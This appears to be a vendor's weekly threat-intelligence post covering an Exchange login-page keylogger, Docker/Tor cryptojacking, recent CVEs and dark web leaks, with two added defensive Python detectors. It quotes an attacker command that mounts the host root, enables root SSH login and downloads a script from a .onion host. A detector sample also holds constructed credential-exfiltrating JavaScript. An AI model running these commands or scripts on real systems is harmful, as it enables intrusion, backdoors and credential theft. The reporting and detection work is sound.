This week’s intelligence reveals an escalation in targeted exploitation of emerging software flaws, novel stealthy attack techniques leveraging legitimate infrastructure, and politically driven data leaks orchestrated via dark web channels. Three high-severity vulnerabilities—affecting Langflow AI servers, Citrix NetScaler appliances, and default Linux configurations—have been weaponized in the wild. Attackers are also innovating with JavaScript-based credential harvesting on Microsoft Exchange, and misconfigured Docker APIs combined with the Tor network for stealthy cryptojacking. Meanwhile, hacktivist actors and criminal forums on the dark web have amplified campaigns against high-profile events and mass-market IoT devices.
New Hacking Techniques Emerged This Week
1. JavaScript Keylogger Injection on Microsoft Exchange Login Pages
Overview:
Unidentified actors are exploiting legacy Exchange Server vulnerabilities to insert malicious JavaScript into Outlook Web Access login pages. Two variants have been observed: one writes keystrokes to a file on the compromised server, retrievable via an external request; the other exfiltrates credentials in real time via a Telegram-based APIKey/AuthToken mechanism.
Technical Insight:
After gaining unauthenticated RCE through ProxyShell (CVE-2021-31207, CVE-2021-34473, etc.), the attacker modifies auth.owa to hook form submissions. The injected code encodes captured username/password pairs in Base64 and sends them either over DNS tunnels or HTTP(S) GET requests to a Telegram bot endpoint, bypassing egress filtering.
Impact/Risk:
Victims—including government agencies and logistics firms across 26 countries—have had plaintext credentials harvested for lateral movement and privilege escalation, with minimal chance of detection due to the absence of anomalous outbound connections.
Takeaway for CISO:
Ensure all Exchange servers are patched against ProxyShell and ProxyLogon flaws, enable anomalous script monitoring on IIS, and implement multi-factor authentication with threat-aware login flows.
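The "anomalous script monitoring" recommended above can be made concrete. The following added example (not from the original article or from FireCompass) scans the HTML served by an OWA login page for the combination of behaviours the article describes: a hook on form submission or a read of the password field, together with Base64 encoding or an outbound beacon to a Telegram bot endpoint. It also keeps a SHA-256 fingerprint of a known-good page so that any change to the served login page is noticed even when the injected script uses a pattern not in the indicator list. The two sample pages and the indicator regexes are constructed for illustration; the bot token is a placeholder.

```python
"""Detect injected credential-harvesting JavaScript on an OWA login page.

Added example, not code from the article.  The sample pages, indicator list
and placeholder token below are constructed for illustration only.
"""
import hashlib
import re

# Constructed: a minimal legitimate login fragment (the real page is larger).
CLEAN_LOGIN_PAGE = """<form action="/owa/auth.owa" method="post" name="logonForm">
<input name="username"><input name="password" type="password">
<script>function clkLgn(){document.logonForm.submit();}</script>
</form>"""

# Constructed: the same page with a submit hook of the kind the article
# describes (Base64-encoded credentials beaconed to a Telegram bot URL).
INJECTED_LOGIN_PAGE = CLEAN_LOGIN_PAGE.replace("</form>", """<script>
document.logonForm.onsubmit = function () {
  var d = btoa(document.logonForm.username.value + ':' + document.logonForm.password.value);
  new Image().src = 'https://api.telegram.org/bot<PLACEHOLDER_TOKEN>/sendMessage?chat_id=0&text=' + d;
};
</script></form>""")

# Indicators: (name, regex).  The first two show credential capture, the
# rest show encoding or exfiltration.  Both groups must fire to flag a page.
INDICATORS = [
    ("submit_hook", re.compile(r"onsubmit\s*=|addEventListener\(\s*['\"]submit['\"]", re.I)),
    ("reads_password_field", re.compile(r"\.password\.value|getElementById\(\s*['\"]password['\"]", re.I)),
    ("base64_encode", re.compile(r"\bbtoa\s*\(", re.I)),
    ("telegram_endpoint", re.compile(r"api\.telegram\.org/bot", re.I)),
    ("image_beacon", re.compile(r"new\s+Image\(\)\.src\s*=", re.I)),
]
CAPTURE_INDICATORS = {"submit_hook", "reads_password_field"}
EXFIL_INDICATORS = {"base64_encode", "telegram_endpoint", "image_beacon"}

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)


def script_blocks(html):
    """Return the bodies of every inline <script> element on the page."""
    return SCRIPT_RE.findall(html)


def scan_login_page(html):
    """Match inline scripts against INDICATORS and return hits plus a verdict.

    The page is flagged only when a capture indicator and an exfiltration
    indicator both fire, which keeps the legitimate submit() helper quiet.
    """
    hits = set()
    for body in script_blocks(html):
        for name, pattern in INDICATORS:
            if pattern.search(body):
                hits.add(name)
    suspicious = bool(hits & CAPTURE_INDICATORS) and bool(hits & EXFIL_INDICATORS)
    return {"hits": sorted(hits), "suspicious": suspicious}


def page_fingerprint(html):
    """SHA-256 of the page with whitespace normalised, used as a baseline."""
    normalised = re.sub(r"\s+", " ", html).strip().encode()
    return hashlib.sha256(normalised).hexdigest()


def drifted(html, baseline_fingerprint):
    """True when the served page no longer matches the known-good baseline."""
    return page_fingerprint(html) != baseline_fingerprint


if __name__ == "__main__":
    baseline = page_fingerprint(CLEAN_LOGIN_PAGE)
    for label, page in (("clean", CLEAN_LOGIN_PAGE), ("injected", INJECTED_LOGIN_PAGE)):
        print(label, scan_login_page(page), "drift:", drifted(page, baseline))
```

In practice the baseline fingerprint is recorded immediately after patching, and the scan is run against the page as fetched through the same URL external users hit, since the injection lives in the served auth.owa content rather than in a separate file.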
2. Stealthy Cryptojacking via Misconfigured Docker APIs and Tor
Overview:
Attackers are scanning the internet for exposed Docker daemons, then creating privileged containers mounted to the host root filesystem. Within these containers, they install Tor (via a Base64-encoded shell script) to anonymize C2 traffic, and deploy XMRig miners that connect to hidden .onion pools.
Technical Insight:
The exploit chain begins with a docker ps request to 198.199.72[.]27. If the daemon allows remote control, the adversary runs:
```bash
docker run -v /:/hostroot -d alpine sh -c "\
echo 'Base64-TOR-Setup-Script' | base64 -d | sh; \
cp /hostroot/etc/ssh/sshd_config .; \
echo 'PermitRootLogin yes' >> sshd_config; \
docker-init.sh; \
wget http://wtxqf54djhp5pskv2lfyduub5ievxbyvlzjgjopk6hxge5umombr63ad.onion/install.sh \
"
```
This script configures SSH backdoors, installs masscan and torsocks, and stages the XMRig miner with hardcoded wallet addresses.
Impact/Risk:
Compromised cloud workloads and on-prem servers are conscripted into crypto-mining botnets, leading to increased CPU costs, degraded performance, and potential pivoting into internal networks.
Takeaway for CISO:
Block remote Docker API ports (2375), require TLS and mutual auth on Docker daemons, monitor for anomalous container creation, and restrict installation of unauthorized binaries.
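The two controls that matter most here, a daemon that is not reachable over plain TCP and no container that bind-mounts the host root, can be checked mechanically. The following added example (not from the original article or from FireCompass) audits a daemon.json string and a list of `docker inspect`-style container records, flagging a tcp:// listener without tlsverify, the plaintext port 2375, privileged containers, and any bind whose host side is `/` (the `-v /:/hostroot` pattern from the command above). The weak and hardened daemon.json contents and the container records are constructed for illustration; the certificate paths are placeholders.

```python
"""Audit a Docker host for the exposure pattern described above.

Added example, not code from the article.  The daemon.json strings and the
container records are constructed; they mirror the shape of real daemon.json
and `docker inspect` output but are not taken from any live system.
"""
import json

# Constructed: the weak setting, a plaintext TCP listener on 2375 with no TLS.
WEAK_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"],
})

# Constructed: the corrected setting, TLS with client certificate verification
# (certificate paths are placeholders).
HARDENED_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2376"],
    "tlsverify": True,
    "tlscacert": "/etc/docker/ca.pem",
    "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem",
})

# Constructed `docker inspect` records, trimmed to the fields used here.
SAMPLE_CONTAINERS = [
    {"Name": "/web", "Image": "nginx",
     "HostConfig": {"Privileged": False,
                    "Binds": ["/srv/www:/usr/share/nginx/html:ro"]}},
    {"Name": "/suspect", "Image": "alpine",
     "HostConfig": {"Privileged": True, "Binds": ["/:/hostroot"]}},
]


def audit_daemon_config(daemon_json):
    """Return a list of findings for the given daemon.json text."""
    cfg = json.loads(daemon_json)
    findings = []
    tcp_hosts = [h for h in cfg.get("hosts", []) if h.startswith("tcp://")]
    if tcp_hosts and not cfg.get("tlsverify"):
        findings.append("tcp listener without tlsverify: " + ", ".join(tcp_hosts))
    for host in tcp_hosts:
        if host.endswith(":2375"):
            findings.append("plaintext API port 2375 exposed on " + host)
    return findings


def host_path(bind):
    """Host side of a bind spec written as 'host:container[:options]'."""
    return bind.split(":", 1)[0]


def audit_container(record):
    """Return findings for one container record (empty list if clean)."""
    findings = []
    host_config = record.get("HostConfig", {})
    if host_config.get("Privileged"):
        findings.append("privileged")
    for bind in host_config.get("Binds") or []:
        if host_path(bind) == "/":
            findings.append("host root bind-mounted at " + bind)
    return findings


def audit_containers(records):
    """Map container name to findings, keeping only containers with findings."""
    report = {}
    for record in records:
        findings = audit_container(record)
        if findings:
            report[record["Name"]] = findings
    return report


if __name__ == "__main__":
    print("weak daemon.json:", audit_daemon_config(WEAK_DAEMON_JSON))
    print("hardened daemon.json:", audit_daemon_config(HARDENED_DAEMON_JSON))
    print("containers:", audit_containers(SAMPLE_CONTAINERS))
```

On a real host the container records come from `docker inspect $(docker ps -aq)` and the config from /etc/docker/daemon.json; running the audit from a scheduled job and alerting on any non-empty report gives the "monitor for anomalous container creation" control a concrete trigger.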
New Critical Attack Techniques and CVEs
CVE-2025-3248: Langflow Missing Authentication → Flodrix Botnet DDoS
- Date of Incident: June 19, 2025
- Overview: A missing authentication flaw in Langflow < 1.3.0 allows unauthenticated HTTP requests to spawn commands, exploited to deploy the Flodrix IoT botnet for high-volume DDoS campaigns against AI infrastructure.
- CVSS 3.1: 9.8 (Critical)
- Impact: Full RCE on exposed Langflow servers, data exfiltration, service outages up to 100 Gbps.
- Takeaway: Upgrade to Langflow 1.3.0+, implement network segmentation, and monitor for emerging Flodrix C2 indicators.
FireCompass continuously scans for known CVEs—including Langflow and AI infra misconfigurations—before threat actors find them.
Do you want to see your exposure to known CVEs? Schedule a Demo.
CVE-2025-5777: Citrix NetScaler ADC/Gateway Critical RCE
- Date of Disclosure: June 24, 2025
- Overview: Citrix patched a critical buffer overflow in NetScaler ADC and Gateway’s parsing logic, which can be exploited via crafted HTTP requests to achieve RCE on network-edge appliances.
- CVSS 3.x: 9.0 (Critical)
- Impact: Potential full takeover of VPN gateways, credential theft, and persistent backdoors.
- Takeaway: Immediately apply Citrix’s security update, restrict management interfaces, and audit access logs for anomalous GET/POST requests.
CVE-2025-6018 & CVE-2025-6019: Linux Local Privilege Escalation Chain
- Date of Discovery: June 18, 2025
- Overview: A misconfiguration in PAM on openSUSE/SLE (CVE-2025-6018) permits any SSH session to be treated as a local console login. When combined with a libblockdev bug in the udisks daemon (CVE-2025-6019), attackers can achieve root access without additional patches.
- Impact: Rapid user-to-root privilege escalation on default-configured Linux hosts, enabling kernel-level persistence and lateral movement.
- Takeaway: Apply distro patches, enforce strict allow_active settings in PAM, and disable unnecessary udisks services on servers.
FireCompass detects privilege escalation paths and chaining of multiple CVEs—before attackers can exploit them.
If you’d like to see FireCompass in action, don’t hesitate to Schedule a Demo.
Underworld Whispers: Dark Web Intel Insights
Hacktivist Data Leak—“Cyber Fattah” Targets Saudi Games
- Date of Leak: June 22, 2025
- Overview: The pro-Iranian hacktivist group Cyber Fattah exfiltrated and published SQL dumps—including passport scans, medical certificates, and IBANs—of 6,000+ Saudi Games athletes via phpMyAdmin exploitation. Released on the dark web by “ZeroDayX,” it underscores the intersection of geopolitics and cyber disruption.
- Implications: Exposure of high-profile PII for propaganda and extortion, erosion of public trust in event security.
IoT Surveillance Device Chatter—40,000+ Cameras Exposed
- Observation Window: Early–Mid June 2025
- Insight: Bitsight reports active dark web forum discussions where attackers share scripts to enumerate HTTP/RTSP cameras, auto-extract live feeds, and integrate them into Mirai-style botnets. Over 14,000 devices in the U.S. alone remain vulnerable due to default credentials and open ports.
- Implications: Surveillance cameras can serve as pivot points into corporate networks or as distributed DDoS platforms.
Outpace Attackers With AI-Based Automated Penetration Testing With FireCompass:
FireCompass is a single platform for AI-Powered Continuous Automated Red Teaming (CART), Pen Testing & NextGen Attack Surface Management